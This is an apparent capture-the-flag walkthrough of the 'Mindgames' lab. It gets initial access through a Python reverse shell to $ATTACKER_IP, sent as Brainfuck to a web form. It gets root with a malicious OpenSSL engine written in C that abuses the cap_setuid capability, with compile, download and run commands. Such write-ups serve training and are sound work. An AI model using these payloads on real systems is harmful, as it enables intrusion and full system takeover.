Mindgames - Writeup

1 minute read

Oct 05, 2020

Mindgames Writeup

Nmap Scan :

bvr0n@kali:~/CTF/THM/Mindgames$ nmap -sC -sV -Pn 10.10.149.6

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:4f:06:26:0e:d3:7c:b8:18:42:40:12:7a:9e:3b:71 (RSA)
|   256 5c:2b:3c:56:fd:60:2f:f7:28:34:47:55:d6:f8:8d:c1 (ECDSA)
|_  256 da:16:8b:14:aa:58:0e:e1:74:85:6f:af:bf:6b:8d:58 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Mindgames.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Page :

Looks like we have some brainfuck, after decoding the first one it gives some python3 regular :

print("Hello, World")

But when submitting the brainfuck code in the bottom form, it looks like it executs everything in python, let’s turn our text into brainfuck get a revershell with this :

import os

os.system('bash -c "bash -i >& /dev/tcp/$ATTACKER_IP/8080 0>&1"')

And we got a reverse shell.

Internal Enum :

Something caught my eyes when running linpeas :

Files with capabilities:
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/openssl = cap_setuid+ep
/home/mindgames/webserver/server = cap_net_bind_service+ep
/home/mindgames/webserver/server = cap_net_bind_service+ep is writable

You can find out more about cap_setuid HERE :

Now based on GTFOBins :

It loads shared libraries that may be used to run code in the binary execution context.

Solution :

So in conclusion we need to create An OpenSSL Engine, Check Here :

This is the final script :

#include <openssl/engine.h>
#include <unistd.h>

static int bind(ENGINE *e, const char *id)
{
  setuid(0);
  setgid(0);
  system("/bin/bash");
}


IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
bvr0n@kali:~$ gcc -fPIC -o ssl-foo.o -c ssl-foo.c 
bvr0n@kali:~$ gcc -shared -o ssl-foo.so -lcrypto ssl-foo.o

then we download it from the victim’s machine :

mindgames@mindgames:/tmp$ wget $ATTACKER_IP:8000/ssl-foo.so

and run our little engine :

mindgames@mindgames:/tmp$ openssl engine -t `pwd`/ssl-foo.so
root@mindgames:/tmp# id
uid=0(root) gid=1001(mindgames) groups=1001(mindgames)

And we are ROOT!!


best regards

bvr0n


back to main()


Updated: